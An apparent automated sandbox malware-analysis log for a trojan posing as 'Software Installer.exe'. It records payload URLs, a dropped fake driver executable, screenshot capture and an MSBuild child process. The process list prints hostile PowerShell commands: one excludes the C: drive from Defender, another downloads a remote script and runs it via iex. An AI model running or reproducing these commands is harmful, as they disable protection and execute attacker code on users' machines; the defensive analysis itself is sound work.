Source: powershell.exe, 00000001.00000002.1537154650.000001E85BC96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1451937888.0000011AE3E4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1496243972.0000011AF24F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1496243972.0000011AF2639000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1708631354.000001A997795000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.1451937888.0000011AE30B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://trumpsscamer2009.top
Source: Software Installer.exe, 00000000.00000002.2648602721.00000196E30D7000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://trumpsscamer2009.top/bld/Microsoft_Driver_vs_2019.exex
Source: Software Installer.exe, 00000000.00000002.2648602721.00000196E30D7000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://trumpsscamer2009.top/bld/Printer_driver_Setup_Install_v32.12.71.exe
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C00000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://trumpsscamer2009.top/bld/Printer_driver_Setup_Install_v32.12.71.exehttps://trumpsscamer2009.
Source: powershell.exe, 00000003.00000002.1451271173.0000011AE08D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://trumpsscamer2009.top/scr/plugin
Source: unknown | HTTPS traffic detected: 172.67.159.94:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.159.94:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.159.94:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 13_2_0043F410 OpenClipboard, GetClipboardData, GlobalLock, GetWindowRect, GlobalUnlock, CloseClipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 13_2_0043FE3C GetDC, GetSystemMetrics, GetSystemMetrics, GetSystemMetrics, GetCurrentObject, GetObjectW, DeleteObject, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, BitBlt, SelectObject, DeleteDC, ReleaseDC, DeleteObject

System Summary

Source: Process Memory Space: powershell.exe PID: 7064, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution. Author: ditekSHen
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040356013_2_00403560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0042556013_2_00425560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00413D0913_2_00413D09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040AD2013_2_0040AD20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043B53613_2_0043B536
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0041EDDC13_2_0041EDDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0044B58013_2_0044B580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00420D9013_2_00420D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00407DA013_2_00407DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004305B213_2_004305B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043364013_2_00433640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0044865013_2_00448650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043C61013_2_0043C610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043762713_2_00437627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0044B62213_2_0044B622
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040CE3013_2_0040CE30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040E6D013_2_0040E6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00444ED013_2_00444ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00445ED113_2_00445ED1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004326E013_2_004326E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004386EC13_2_004386EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00430E9313_2_00430E93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00410EAB13_2_00410EAB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00403F0013_2_00403F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043E70313_2_0043E703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0041AF0013_2_0041AF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040C71013_2_0040C710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043672913_2_00436729
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0042D73013_2_0042D730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00408FC013_2_00408FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0044C7D013_2_0044C7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004047E213_2_004047E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004437A013_2_004437A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040EFAE13_2_0040EFAE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 0040B350 appears 52 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 0041AEF0 appears 102 times
Source: Software Installer.exe | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Source: Software Installer.exe | Binary or memory string: OriginalFilename vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2653422218.000001D776DA1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Primitives.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2653065772.000001D775261000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.Specialized.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2647654410.00000196DC880000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Runtime.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2654007016.000001D7775C1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Diagnostics.DiagnosticSource.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2654304809.000001D777801000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Http.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2652733750.000001D775080000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Text.Encoding.Extensions.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2656228625.000001D778571000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Private.DataContractSerialization.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Security.Claims.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2653948791.000001D777590000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Diagnostics.Tracing.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2649945136.000001D773320000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2652331382.000001D774FE0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Memory.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2654943566.000001D777C40000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Runtime.Loader.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2654693448.000001D777A80000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Security.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655606492.000001D778150000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Reflection.Primitives.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2653300355.000001D776D31000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.NetworkInformation.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2656419896.000001D778770000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Text.RegularExpressions.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655994166.000001D778370000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Private.DataContractSerialization.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2649480850.000001D773211000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Security.Principal.Windows.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2649978603.000001D773370000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Security.Claims.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655586732.000001D778140000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Reflection.Emit.Lightweight.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655712102.000001D7781F1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Sockets.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2654918441.000001D777C20000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.NameResolution.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2654134907.000001D777650000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Http.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2652800615.000001D7750E0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Linq.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655900956.000001D7782B0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.SystemEvents.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2653520316.000001D776DF0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Threading.ThreadPool.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2649544937.000001D773240000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Security.Principal.Windows.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2652602234.000001D775061000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.Registry.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2656547373.000001D778871000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Text.RegularExpressions.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655816250.000001D778281000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Drawing.Primitives.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655435986.000001D7780C1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655879109.000001D7782A0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.ComponentModel.EventBasedAsync.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2649808115.000001D7732F1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.IO.FileSystem.DriveInfo.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2647371651.00000196DC751000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.ServicePoint.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2652887365.000001D775171000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Linq.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2647807829.00000196DC8F1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Console.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2652519231.000001D775040000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Threading.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2653230217.000001D776CF0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Runtime.Intrinsics.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2654092565.000001D777630000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Runtime.Serialization.Xml.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2649882906.000001D773301000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Threading.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2653499701.000001D776DE0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Threading.Overlapped.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2647673178.00000196DC890000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameReloaderPlugin.dll> vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655509664.000001D778110000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Runtime.Serialization.Primitives.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2653138908.000001D775280000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.Specialized.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2653187115.000001D776CC1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Runtime.Serialization.Primitives.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2652246216.000001D774FA1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2654786945.000001D777B31000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Security.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2654113621.000001D777640000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Xml.ReaderWriter.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655966920.000001D778340000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Drawing.Primitives.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2647763064.00000196DC8C0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Console.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2652976429.000001D775200000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Threading.Thread.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2649763096.000001D7732D0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Runtime.InteropServices.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000000.1392144079.00007FF6A4578000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamemscordaccore.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000000.1392144079.00007FF6A4578000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameReloaderPlugin.dll> vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655229213.000001D777EC1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Security.Cryptography.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655566992.000001D778130000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Reflection.Emit.ILGeneration.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2647868922.00000196DC920000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameNETdesign.dll4 vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2648012640.00000196DE210000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.IO.FileSystem.DriveInfo.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2652996729.000001D775210000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.Registry.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2654538768.000001D777A21000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Private.Uri.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2654629650.000001D777A61000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.NameResolution.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2648087403.00000196DE281000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2653368487.000001D776D60000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Primitives.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655625974.000001D778160000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Sockets.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2652407174.000001D775011000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Memory.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2650876819.000001D774111000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2654964425.000001D777C50000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2653250976.000001D776D00000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.NetworkInformation.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2652757290.000001D775090000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Management.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2653928289.000001D777580000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Runtime.Serialization.Json.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2648034270.00000196DE220000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2647707848.00000196DC8A1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655043542.000001D777CC0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Security.Cryptography.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2654475381.000001D7779B0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Diagnostics.DiagnosticSource.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655922975.000001D7782C0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Drawing.Common.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655023098.000001D777CB0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.ServicePoint.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2647991281.00000196DE1F0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2653023838.000001D775240000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.Primitives.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2649696226.000001D7732B1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Runtime.InteropServices.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2654880930.000001D777BE0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Private.Uri.dll@ vs Software Installer.exe
Source: Process Memory Space: powershell.exe PID: 7064, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Microsoft_Driver_vs_2019.exe.0.dr | Static PE information: Section: .bss ZLIB complexity 1.0003231990014265
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@15/13@4/5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 13_2_00444300 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW
Source: C:\Users\user\Desktop\Software Installer.exe | File created: C:\Users\user\Microsoft_Driver_vs_2019.exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7008:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1424:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1652:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5560:120:WilError_03
Source: C:\Users\user\Desktop\Software Installer.exe | File created: C:\Users\user\AppData\Local\Temp\2025-03-14-14-43-35-screenshot.png
Source: C:\Users\user\Desktop\Software Installer.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Software Installer.exe | String found in binary or memory: requests-started
Source: Software Installer.exe | String found in binary or memory: requests-started-rate
Source: unknown | Process created: C:\Users\user\Desktop\Software Installer.exe "C:\Users\user\Desktop\Software Installer.exe"
Source: C:\Users\user\Desktop\Software Installer.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Software Installer.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Software Installer.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Software Installer.exe | Process created: C:\Users\user\Microsoft_Driver_vs_2019.exe "C:\Users\user\Microsoft_Driver_vs_2019.exe"
Source: C:\Users\user\Microsoft_Driver_vs_2019.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Microsoft_Driver_vs_2019.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\Software Installer.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Users\user\Desktop\Software Installer.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::UTF8.GetString((iwr "https://trumpsscamer2009.top/scr/plugin" -UseBasicParsing).Content) | iex"
Source: C:\Users\user\Desktop\Software Installer.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Users\user\Desktop\Software Installer.exe | Process created: C:\Users\user\Microsoft_Driver_vs_2019.exe "C:\Users\user\Microsoft_Driver_vs_2019.exe"
Source: C:\Users\user\Microsoft_Driver_vs_2019.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: icu.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\Software Installer.exeSection loaded: dhcpcsvc.dllJump to behavior
